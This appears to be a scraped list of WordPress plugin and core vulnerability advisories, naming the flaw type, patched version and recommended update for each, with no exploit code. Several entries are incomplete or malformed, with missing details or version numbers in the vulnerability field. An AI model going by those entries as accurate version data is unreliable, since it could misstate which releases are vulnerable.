Plugin: Awesome Filterable Portfolio

Vulnerability: Blind SQL Injection
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: HT Mega – Absolute Addons For Elementor

Vulnerability: Absolute Addons for Elementor Page Builder <= 1.5.5
Patched Version: 1.5.7
Recommended Action: Update to version 1.5.7, or a newer patched version

Plugin: Users To CSV

Plugin: Media File Renamer: Rename for better SEO (AI-Powered)

Vulnerability: Missing Authorization Checks
Patched Version: 5.2.6
Recommended Action: Update to version 5.2.6, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: WP Social Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: WP Job Board

Vulnerability: SQL Injection
Patched Version: 5.7.0
Recommended Action: Update to version 5.7.0, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.4
Recommended Action: Update to version 4.2.4, or a newer patched version

Plugin: Auto Thickbox Plus

Plugin: Contact Form 7 Extension For Mailchimp

Vulnerability: Authenticated (Subscriber+) Server-Side Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SP Project & Document Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.26
Recommended Action: Update to version 4.26, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.68.7
Recommended Action: Update to version 1.68.7, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: WP-Members Membership Plugin

Vulnerability: Missing Authorization to Settings Update
Patched Version: 3.4.8
Recommended Action: Update to version 3.4.8, or a newer patched version

Plugin: WPGlobus Translate Options

Vulnerability: Reflected Cross-Site Scripting via page
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: WP Webmaster

Vulnerability: Cross-Site Request Forgery
Patched Version: 8.2.4
Recommended Action: Update to version 8.2.4, or a newer patched version

Plugin: WP Database Backup – Unlimited Database & Files Backup by Backup for WP

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 2.1.9
Recommended Action: Update to version 2.1.9, or a newer patched version

Plugin: Funnel Builder for WordPress by FunnelKit – Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells

Vulnerability: Authenticated(Administrator+) SQL Injection
Patched Version: 2.14.4
Recommended Action: Update to version 2.14.4, or a newer patched version

Plugin: Permalinks Customizer

Vulnerability: Cross-Site Request Forgery via post_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery and Stored Cross-Site Scripting
Patched Version: 2.0.52
Recommended Action: Update to version 2.0.52, or a newer patched version

Plugin: VR Calendar

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Category Meta plugin

Plugin: Easy Digital Downloads – Commissions

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Product Slider and Carousel with Category for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.5.1.3
Recommended Action: Update to version 1.5.1.3, or a newer patched version

Plugin: WP Tabs – Responsive Tabs and Custom Product Tabs

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1.17
Recommended Action: Update to version 2.1.17, or a newer patched version

Plugin: Knight Lab Timeline

Vulnerability: Stored Cross-Site Scripting
Patched Version: 3.7.0
Recommended Action: Update to version 3.7.0, or a newer patched version

Plugin: Horizontal scrolling announcement

Plugin: Cyberus Key

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘uid’ in ‘cyberkey_settings’ Plugin Setting
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Easy Google Adsense and Banner Ads Manager – AdsforWP

Vulnerability: Cross-Site Scripting
Patched Version: 1.6
Recommended Action: Update to version 1.6, or a newer patched version

Plugin: Advanced Contact form 7 DB

Vulnerability: SQL Injection
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: Post and Page Builder by BoldGrid – Visual Drag and Drop Editor

Vulnerability: Cross-Site Request Forgery via submitDefaultEditor
Patched Version: 1.24.2
Recommended Action: Update to version 1.24.2, or a newer patched version

Plugin: Validated

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: GD Star Rating

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.17
Recommended Action: Update to version 1.9.17, or a newer patched version

Plugin: BePro Listings

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 2.2.0021
Recommended Action: Update to version 2.2.0021, or a newer patched version

Plugin: Tree Sitemap (Pages, Posts & Categories list)

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 2.9
Recommended Action: Update to version 2.9, or a newer patched version

Plugin: Download Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.50
Recommended Action: Update to version 2.9.50, or a newer patched version

Plugin: Custom Post View Generator

Plugin: Popups supercharged: Stunning templates for email, SMS, discount popups, product recommendation etc.

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Add Custom Post Type into Post Query

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Kali Forms <= 2.3.27
Patched Version: 2.3.28
Recommended Action: Update to version 2.3.28, or a newer patched version

Plugin: GoDaddy Email Marketing

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: TP Education

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcodes
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authenticated (Admin+) Insecure Direct Object Reference to Arbitrary User Password Change
Patched Version: 5.2.1.0
Recommended Action: Update to version 5.2.1.0, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via Comments
Patched Version: 3.7.30
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.30, 3.8.30, 3.9.28, 4.0.27, 4.1.27, 4.2.24, 4.3.20, 4.4.19, 4.5.18, 4.6.15, 4.7.13, 4.8.10, 4.9.11, 5.0.6, 5.1.2, 5.2.3

Plugin: Health Check & Troubleshooting

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Perfect Survey

Vulnerability: Unauthenticated SQL Injection
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: wp-live-chat-support-pro

Vulnerability: Remote Code Execution via unrestricted file upload
Patched Version: 8.0.07
Recommended Action: Update to version 8.0.07, or a newer patched version

Plugin: Quiz and Survey Master (QSM) – Easy Quiz and Survey Maker

Vulnerability: Arbitrary File Upload
Patched Version: 7.0.1
Recommended Action: Update to version 7.0.1, or a newer patched version

Plugin: wp-mon

Plugin: CatalogX – Product Catalog Mode For WooCommerce

Vulnerability: Arbitrary File Upload
Patched Version: 3.1.0
Recommended Action: Update to version 3.1.0, or a newer patched version

Plugin: WP-DownloadManager

Vulnerability: Server-Side Request Forgery
Patched Version: 1.68.5
Recommended Action: Update to version 1.68.5, or a newer patched version

Plugin: Easy Appointments

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.11.1
Recommended Action: Update to version 3.11.1, or a newer patched version

Plugin: Custom Login Redirect

Plugin: Social Chat – Click To Chat App Button

Vulnerability: Administrator+ Stored Cross-Site Scripting
Patched Version: 6.0.5
Recommended Action: Update to version 6.0.5, or a newer patched version

Plugin: ArtPlacer Widget

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: 2.20.7
Recommended Action: Update to version 2.20.7, or a newer patched version

Plugin: Per page add to head

Vulnerability: No subtitle
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Row Seats Core

Vulnerability: PHP Object Injection
Patched Version: 2.68
Recommended Action: Update to version 2.68, or a newer patched version

Plugin: Essential Addons for Elementor – Popular Elementor Addon With Ready Templates, Advanced Widgets, Kits & WooCommerce Builders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scritping
Patched Version: 5.9.5
Recommended Action: Update to version 5.9.5, or a newer patched version

Plugin: Ultimate WordPress Auction Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Missing Authorization
Patched Version: 5.8.0
Recommended Action: Update to version 5.8.0, or a newer patched version

Plugin: Chained Quiz

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Facebook App ID
Patched Version: 1.3.2.3
Recommended Action: Update to version 1.3.2.3, or a newer patched version

Plugin: ShareYourCart

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: WORDPRESS VIDEO GALLERY

Vulnerability: SQL Injection
Patched Version: 2.8
Recommended Action: Update to version 2.8, or a newer patched version

Plugin: Chameleon CSS

Plugin: WP Page Builder

Vulnerability: Multiple Stored Cross-Site scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: UserHeat Plugin

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via tree.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Sunshine Photo Cart: Free Client Photo Galleries for Photographers

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 2.8.29
Recommended Action: Update to version 2.8.29, or a newer patched version

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Profile Deletion
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Pricing Tables For WPBakery Page Builder (formerly Visual Composer)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Simple Calendar – Google Calendar Plugin

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via shortcode
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: WP Content Copy Protection & No Right Click

Vulnerability: Missing Authorization to Arbitrary Plugin Installation/Activation
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Mmm Simple File List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Surfer – WordPress Plugin

Vulnerability: Missing Authorization
Patched Version: 1.3.3.379
Recommended Action: Update to version 1.3.3.379, or a newer patched version

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.2.41
Recommended Action: Update to version 2.2.41, or a newer patched version

Plugin: Import XML and RSS Feeds

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: WPGlobus – Multilingual WordPress

Vulnerability: Cross-Site Scripting via wpglobus_option[browser_redirect][redirect_by_language]
Patched Version: 1.9.7
Recommended Action: Update to version 1.9.7, or a newer patched version

Plugin: MainWP Comments Extension

Vulnerability: Missing Authorization
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: FAQ Builder AYS

Vulnerability: Blind SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Drop Shadow Boxes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.7.14
Recommended Action: Update to version 1.7.14, or a newer patched version

Plugin: Flower Delivery by Florist One

Vulnerability: (Admin+) Stored Cross-Site Scripting
Patched Version: 3.5.9
Recommended Action: Update to version 3.5.9, or a newer patched version

Core: WordPress

Vulnerability: Denial of Service via wp-postpass cookie
Patched Version: 3.5.2
Recommended Action: Update to version 3.5.2, or a newer patched version

Plugin: Contact Form 7 – PayPal & Stripe Add-on

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.4
Recommended Action: Update to version 1.9.4, or a newer patched version

Plugin: KiviCare – Clinic & Patient Management System (EHR)

Vulnerability: Reflected Cross-Site Scripting via ‘filterType’
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Kento Post View Counter

Plugin: WP Rollback – Rollback Plugins and Themes

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: Social Media Share Buttons & Social Sharing Icons

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.1.1.12
Recommended Action: Update to version 1.1.1.12, or a newer patched version

Plugin: Five Star Business Profile and Schema

Vulnerability: Subscriber+ Page Creation & Settings Update to Stored Cross-Site Scripting
Patched Version: 2.1.7
Recommended Action: Update to version 2.1.7, or a newer patched version

Plugin: Carousel, Recent Post Slider and Banner Slider

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Maintenance

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 4.03
Recommended Action: Update to version 4.03, or a newer patched version

Plugin: Popup Box: Create Popups Easily

Vulnerability: Authenticated Local File Inclusion
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 20.2.1
Recommended Action: Update to version 20.2.1, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.05.03
Recommended Action: Update to version 2.05.03, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.1
Recommended Action: Update to version 5.6.1, or a newer patched version

Plugin: PPWP – Password Protect Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.8.6
Recommended Action: Update to version 1.8.6, or a newer patched version

Plugin: DW Promobar

Plugin: ShopLentor – WooCommerce Builder for Elementor & Gutenberg +17 Modules – All in One Solution (formerly WooLentor)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Membership Plugin <= 4.0.16
Patched Version: 4.0.17
Recommended Action: Update to version 4.0.17, or a newer patched version

Plugin: EmbedPress – Embed PDF, PDF 3D FlipBook, Instagram Social Feeds, Google Docs, Vimeo, Wistia, YouTube Videos, Maps & Upload PDF Documents

Vulnerability: Sensitive Information Exposure
Patched Version: 3.8.0
Recommended Action: Update to version 3.8.0, or a newer patched version

Plugin: wordpress-backup-to-dropbox

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1
Recommended Action: Update to version 4.1, or a newer patched version

Plugin: Mortgage Calculator / Loan Calculator

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.17
Recommended Action: Update to version 1.5.17, or a newer patched version

Plugin: Autolinks

Plugin: File Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via file_gallery_shortcode
Patched Version: 1.8.5.4
Recommended Action: Update to version 1.8.5.4, or a newer patched version

Plugin: Elementor Addons, Widgets and Enhancements – Stax

Vulnerability: Cross-Site Request Forgery via toggle_widget
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: Easy Coming Soon

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Pressference Exporter

Plugin: wp-smiley

Plugin: mTouch Quiz

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Auto Post, Auto Publish and Schedule to Twitter, LinkedIn and Social Media – WP to Buffer

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Team Members – A WordPress Team Plugin with Gallery, Grid, Carousel, Slider, Table, List, and More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Olimometer

Vulnerability: SQL Injection
Patched Version: 2.57
Recommended Action: Update to version 2.57, or a newer patched version

Plugin: GD Rating System

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Sensei LMS – Online Courses, Quizzes, & Learning

Vulnerability: Missing Authorization
Patched Version: 4.5.2
Recommended Action: Update to version 4.5.2, or a newer patched version

Plugin: IP2Location Country Blocker

Vulnerability: Arbitrary Country Ban via Cross-Site Request Forgery
Patched Version: 2.26.6
Recommended Action: Update to version 2.26.6, or a newer patched version

Plugin: Counter Box: Add Engaging Countdowns, Timers & Counters to Your WordPress Site

Vulnerability: SQL Injection
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: iMember360is

Vulnerability: 3.9.001
Patched Version: 3.9.001
Recommended Action: Update to version 3.9.001, or a newer patched version

Plugin: Verse-O-Matic

Plugin: WP Support Plus Responsive Ticket System

Vulnerability: SQL Injection
Patched Version: 8.0.0
Recommended Action: Update to version 8.0.0, or a newer patched version

Plugin: WordPress Sentinel

Vulnerability: SQL Injection
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: WP Calendar

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: More Featured Images

Plugin: rbxgallery

Vulnerability: Arbitrary File Upload
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: SiteAlert – Uptime, Speed, and Security Monitoring for WordPress

Plugin: Easy Accept Payments via PayPal

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.9.10
Recommended Action: Update to version 4.9.10, or a newer patched version

Plugin: W3 Total Cache

Vulnerability: Arbitrary File Upload
Patched Version: 0.9.5
Recommended Action: Update to version 0.9.5, or a newer patched version

Plugin: AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress

Vulnerability: Cross Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WDContactFormBuilder

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.69
Recommended Action: Update to version 1.0.69, or a newer patched version

Plugin: Smart Slider 3

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.5.1.11
Recommended Action: Update to version 3.5.1.11, or a newer patched version

Plugin: Manual Image Crop

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11
Recommended Action: Update to version 1.11, or a newer patched version

Plugin: WP Ultimate Review

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: wordpress-admanager

Vulnerability: Open Redirection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CLUEVO LMS, E-Learning Platform

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: Ajax Search Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.26.2
Recommended Action: Update to version 4.26.2, or a newer patched version

Plugin: Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages

Vulnerability: Open Redirect
Patched Version: 1.5.1.6
Recommended Action: Update to version 1.5.1.6, or a newer patched version

Plugin: AcyMailing – An Ultimate Newsletter Plugin and Marketing Automation Solution for WordPress

Vulnerability: Open Redirect
Patched Version: 7.5.0
Recommended Action: Update to version 7.5.0, or a newer patched version

Plugin: Editorial Calendar, Marketing Content, Kanban Board – PublishPress Planner

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.1
Recommended Action: Update to version 3.5.1, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Local File Inclusion
Patched Version: 2.11.2
Recommended Action: Update to version 2.11.2, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Buy Me a Coffee – Button and Widget Plugin

Vulnerability: Missing Authorization
Patched Version: 3.8
Recommended Action: Update to version 3.8, or a newer patched version

Plugin: YourChannel: Everything you want in a YouTube plugin.

Vulnerability: Cross-Site Request Forgery to Plugin Language Translation Update
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: RSVPMaker

Vulnerability: Unauthenticated SQL Injection
Patched Version: 9.3.3
Recommended Action: Update to version 9.3.3, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.1.7
Recommended Action: Update to version 3.1.7, or a newer patched version

Plugin: wp-forum

Vulnerability: Remote SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Plugin: youForms for WordPress – Creating Forms for CopeCart

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: AdServe

Vulnerability: SQL Injection
Patched Version: 0.3
Recommended Action: Update to version 0.3, or a newer patched version

Plugin: Events Shortcodes For The Events Calendar

Vulnerability: Authenticated (Contributor+) SQL Injection via shortcode
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: PHP Object Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Countdown and CountUp, WooCommerce Sales Timer

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VK All in One Expansion Unit

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.86.0.0
Recommended Action: Update to version 9.86.0.0, or a newer patched version

Plugin: Yoo Slider – Image Slider & Video Slider

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WooCommerce Amazon Affiliates

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 9.0.2.16
Recommended Action: Update to version 9.0.2.16, or a newer patched version

Plugin: Disqus Comment System

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.76
Recommended Action: Update to version 2.76, or a newer patched version

Plugin: Calculated Fields Form

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.151
Recommended Action: Update to version 1.1.151, or a newer patched version

Plugin: Material Design Icons for Page Builders

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: Modern Footnotes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4.17
Recommended Action: Update to version 1.4.17, or a newer patched version

Plugin: twitter-liveblog

Plugin: GDMylist

Plugin: External Media

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.0.36
Recommended Action: Update to version 1.0.36, or a newer patched version

Plugin: Essential Blocks – Page Builder Gutenberg Blocks, Patterns & Templates

Vulnerability: Missing Authorization via AJAX actions
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Glossary

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.28
Recommended Action: Update to version 2.1.28, or a newer patched version

Plugin: WolfNet IDX for WordPress

Plugin: PictPress

Vulnerability: Directory Traversal
Patched Version: 0.99
Recommended Action: Update to version 0.99, or a newer patched version

Plugin: Rename Media Files

Vulnerability: Authenticated (Contributor+) Remote Code Execution
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Real3D Flipbook

Plugin: Weather Atlas Widget

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: WooCommerce

Vulnerability: Unauthorized Post Meta Creation/Modification
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: Wonder Video Embed

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting in Theme Preview
Patched Version: 3.7.10
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.10, 3.8.10, 3.9.8, 4.0.7, 4.1.7, 4.2.4

Plugin: WP Fastest Cache

Vulnerability: SQL Injection
Patched Version: 0.8.4.9
Recommended Action: Update to version 0.8.4.9, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Menu Settings Update
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Elementor Website Builder – More than Just a Page Builder

Vulnerability: 3.6.2
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Core: WordPress

Vulnerability: Incorrect Authorization for Contributor-level users
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Business Directory Plugin – Easy Listing Directories for WordPress

Vulnerability: Cross-Site Request Forgery to Arbitrary Payment History Update
Patched Version: 5.11.2
Recommended Action: Update to version 5.11.2, or a newer patched version

Plugin: OoohBoi Steroids for Elementor

Vulnerability: Missing Authorization leading to Authenticated (Subscriber+) Attachment Deletion
Patched Version: 2.1.5
Recommended Action: Update to version 2.1.5, or a newer patched version

Plugin: WP Airbnb Review Slider

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Custom Content Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated (Author+) Stored Cross Site Scripting
Patched Version: 3.7.37
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.37, 3.8.37, 3.9.35, 4.0.34, 4.1.34, 4.2.31, 4.3.27, 4.4.26, 4.5.25, 4.6.22, 4.7.22, 4.8.18, 4.9.19, 5.0.15, 5.1.12, 5.2.14, 5.3.11, 5.4.9, 5.5.8, 5.6.7, 5.7.5, 5.8.3

Plugin: Premium Gallery Manager

Plugin: Codup Read Only Admin

Vulnerability: Cross Site Scripting
Patched Version: 1.1.1.8
